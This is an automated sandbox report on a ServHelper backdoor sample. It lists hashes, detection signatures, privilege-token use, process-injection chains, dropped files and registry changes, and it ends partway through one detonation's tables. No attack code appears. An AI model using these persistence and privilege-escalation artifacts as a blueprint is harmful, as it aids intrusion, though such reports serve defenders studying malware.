Malware Analysis Report

2024-10-23 17:53

Sample ID 210809-tdzn1g2rps
Target 86178014e457120d9dc6f6e27453338c
SHA256 d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
Tags
persistence suricata upx servhelper backdoor discovery exploit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8

Threat Level: Known bad

The file 86178014e457120d9dc6f6e27453338c was found to be: Known bad.

Malicious Activity Summary

persistence suricata upx servhelper backdoor discovery exploit trojan

suricata: ET MALWARE ServHelper CnC Inital Checkin

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Blocklisted process makes network request

Possible privilege escalation attempt

Sets DLL path for service in the registry

UPX packed file

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious behavior: LoadsDriver

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-08-09 04:21

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-09 04:21

Reported

2021-08-09 04:23

Platform

win10v20210408

Max time kernel

60s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1984.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A12.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_q0muteo5.kph.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A81.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A32.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_efwzxkbu.afj.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A82.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 808 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 808 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2852 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1324 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1324 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2852 wrote to memory of 1788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 1316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2852 wrote to memory of 1316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1316 wrote to memory of 196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1316 wrote to memory of 196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2852 wrote to memory of 912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 912 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 912 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
